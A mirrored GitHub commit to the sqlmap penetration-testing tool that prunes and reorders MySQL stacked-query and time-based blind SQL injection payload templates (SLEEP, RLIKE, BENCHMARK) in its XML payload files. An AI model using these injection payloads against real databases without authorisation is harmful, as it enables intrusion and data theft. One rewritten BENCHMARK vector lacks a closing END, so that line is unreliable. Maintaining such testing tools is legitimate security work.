Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 79d0890

Browse files
stamparmstamparm
committed
Cleaning some redundant payload(s)
1 parent d27b33e commit 79d0890

3 files changed

Lines changed: 16 additions & 180 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.5.94"
22+
VERSION = "1.0.5.95"
2323
REVISION = getRevisionNumber()
2424
STABLE = VERSION.count('.') <= 2
2525
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/payloads/04_stacked_queries.xml

Lines changed: 2 additions & 43 deletions
Original file line numberDiff line numberDiff line change
@@ -2,51 +2,10 @@
22

33
<root>
44
<!-- Stacked queries tests -->
5-
<test>
6-
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP - comment)</title>
7-
<stype>4</stype>
8-
<level>1</level>
9-
<risk>1</risk>
10-
<clause>0</clause>
11-
<where>1</where>
12-
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
13-
<request>
14-
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
15-
<comment>#</comment>
16-
</request>
17-
<response>
18-
<time>[SLEEPTIME]</time>
19-
</response>
20-
<details>
21-
<dbms>MySQL</dbms>
22-
<dbms_version>&gt; 5.0.11</dbms_version>
23-
</details>
24-
</test>
25-
26-
<test>
27-
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP)</title>
28-
<stype>4</stype>
29-
<level>2</level>
30-
<risk>1</risk>
31-
<clause>0</clause>
32-
<where>1</where>
33-
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
34-
<request>
35-
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
36-
</request>
37-
<response>
38-
<time>[SLEEPTIME]</time>
39-
</response>
40-
<details>
41-
<dbms>MySQL</dbms>
42-
<dbms_version>&gt; 5.0.11</dbms_version>
43-
</details>
44-
</test>
45-
465
<test>
476
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
487
<stype>4</stype>
49-
<level>2</level>
8+
<level>1</level>
509
<risk>1</risk>
5110
<clause>0</clause>
5211
<where>1</where>
@@ -67,7 +26,7 @@
6726
<test>
6827
<title>MySQL &gt; 5.0.11 stacked queries</title>
6928
<stype>4</stype>
70-
<level>3</level>
29+
<level>2</level>
7130
<risk>1</risk>
7231
<clause>0</clause>
7332
<where>1</where>

xml/payloads/05_time_blind.xml

Lines changed: 13 additions & 136 deletions
Original file line numberDiff line numberDiff line change
@@ -2,92 +2,10 @@
22

33
<root>
44
<!-- Time-based boolean tests -->
5-
<test>
6-
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
7-
<stype>5</stype>
8-
<level>1</level>
9-
<risk>1</risk>
10-
<clause>1,2,3,9</clause>
11-
<where>1</where>
12-
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
13-
<request>
14-
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
15-
</request>
16-
<response>
17-
<time>[SLEEPTIME]</time>
18-
</response>
19-
<details>
20-
<dbms>MySQL</dbms>
21-
<dbms_version>&gt;= 5.0.12</dbms_version>
22-
</details>
23-
</test>
24-
25-
<test>
26-
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
27-
<stype>5</stype>
28-
<level>1</level>
29-
<risk>3</risk>
30-
<clause>1,2,3,9</clause>
31-
<where>1</where>
32-
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
33-
<request>
34-
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
35-
</request>
36-
<response>
37-
<time>[SLEEPTIME]</time>
38-
</response>
39-
<details>
40-
<dbms>MySQL</dbms>
41-
<dbms_version>&gt;= 5.0.12</dbms_version>
42-
</details>
43-
</test>
44-
45-
<test>
46-
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
47-
<stype>5</stype>
48-
<level>3</level>
49-
<risk>1</risk>
50-
<clause>1,2,3,9</clause>
51-
<where>1</where>
52-
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
53-
<request>
54-
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
55-
<comment>#</comment>
56-
</request>
57-
<response>
58-
<time>[SLEEPTIME]</time>
59-
</response>
60-
<details>
61-
<dbms>MySQL</dbms>
62-
<dbms_version>&gt;= 5.0.12</dbms_version>
63-
</details>
64-
</test>
65-
66-
<test>
67-
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
68-
<stype>5</stype>
69-
<level>3</level>
70-
<risk>3</risk>
71-
<clause>1,2,3,9</clause>
72-
<where>1</where>
73-
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
74-
<request>
75-
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
76-
<comment>#</comment>
77-
</request>
78-
<response>
79-
<time>[SLEEPTIME]</time>
80-
</response>
81-
<details>
82-
<dbms>MySQL</dbms>
83-
<dbms_version>&gt;= 5.0.12</dbms_version>
84-
</details>
85-
</test>
86-
875
<test>
886
<title>MySQL &gt;= 5.0.12 AND time-based blind</title>
897
<stype>5</stype>
90-
<level>2</level>
8+
<level>1</level>
919
<risk>1</risk>
9210
<clause>1,2,3,9</clause>
9311
<where>1</where>
@@ -107,7 +25,7 @@
10725
<test>
10826
<title>MySQL &gt;= 5.0.12 OR time-based blind</title>
10927
<stype>5</stype>
110-
<level>2</level>
28+
<level>1</level>
11129
<risk>3</risk>
11230
<clause>1,2,3,9</clause>
11331
<where>1</where>
@@ -127,7 +45,7 @@
12745
<test>
12846
<title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
12947
<stype>5</stype>
130-
<level>4</level>
48+
<level>3</level>
13149
<risk>1</risk>
13250
<clause>1,2,3,9</clause>
13351
<where>1</where>
@@ -148,7 +66,7 @@
14866
<test>
14967
<title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
15068
<stype>5</stype>
151-
<level>4</level>
69+
<level>3</level>
15270
<risk>3</risk>
15371
<clause>1,2,3,9</clause>
15472
<where>1</where>
@@ -248,51 +166,10 @@
248166
</details>
249167
</test>
250168

251-
<test>
252-
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SLEEP)</title>
253-
<stype>5</stype>
254-
<level>2</level>
255-
<risk>1</risk>
256-
<clause>1,2,3,9</clause>
257-
<where>1</where>
258-
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
259-
<request>
260-
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
261-
</request>
262-
<response>
263-
<time>[SLEEPTIME]</time>
264-
</response>
265-
<details>
266-
<dbms>MySQL</dbms>
267-
<dbms_version>&gt;= 5.0.12</dbms_version>
268-
</details>
269-
</test>
270-
271-
<test>
272-
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SLEEP - comment)</title>
273-
<stype>5</stype>
274-
<level>4</level>
275-
<risk>1</risk>
276-
<clause>1,2,3,9</clause>
277-
<where>1</where>
278-
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
279-
<request>
280-
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
281-
<comment>#</comment>
282-
</request>
283-
<response>
284-
<time>[SLEEPTIME]</time>
285-
</response>
286-
<details>
287-
<dbms>MySQL</dbms>
288-
<dbms_version>&gt;= 5.0.12</dbms_version>
289-
</details>
290-
</test>
291-
292169
<test>
293170
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
294171
<stype>5</stype>
295-
<level>5</level>
172+
<level>2</level>
296173
<risk>1</risk>
297174
<clause>1,2,3,9</clause>
298175
<where>1</where>
@@ -312,7 +189,7 @@
312189
<test>
313190
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>
314191
<stype>5</stype>
315-
<level>5</level>
192+
<level>4</level>
316193
<risk>1</risk>
317194
<clause>1,2,3,9</clause>
318195
<where>1</where>
@@ -1392,9 +1269,9 @@
13921269
<risk>1</risk>
13931270
<clause>1,2,3,9</clause>
13941271
<where>3</where>
1395-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
1272+
<vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>
13961273
<request>
1397-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
1274+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>
13981275
</request>
13991276
<response>
14001277
<time>[SLEEPTIME]</time>
@@ -1406,7 +1283,7 @@
14061283
</test>
14071284

14081285
<test>
1409-
<title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (SLEEP)</title>
1286+
<title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)</title>
14101287
<stype>5</stype>
14111288
<level>3</level>
14121289
<risk>1</risk>
@@ -1432,9 +1309,9 @@
14321309
<risk>2</risk>
14331310
<clause>1,2,3,9</clause>
14341311
<where>3</where>
1435-
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
1312+
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>
14361313
<request>
1437-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
1314+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>
14381315
</request>
14391316
<response>
14401317
<time>[DELAYED]</time>
@@ -1769,9 +1646,9 @@
17691646
<risk>1</risk>
17701647
<clause>2,3</clause>
17711648
<where>1</where>
1772-
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
1649+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>
17731650
<request>
1774-
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
1651+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>
17751652
</request>
17761653
<response>
17771654
<time>[SLEEPTIME]</time>

0 commit comments

Comments
 (0)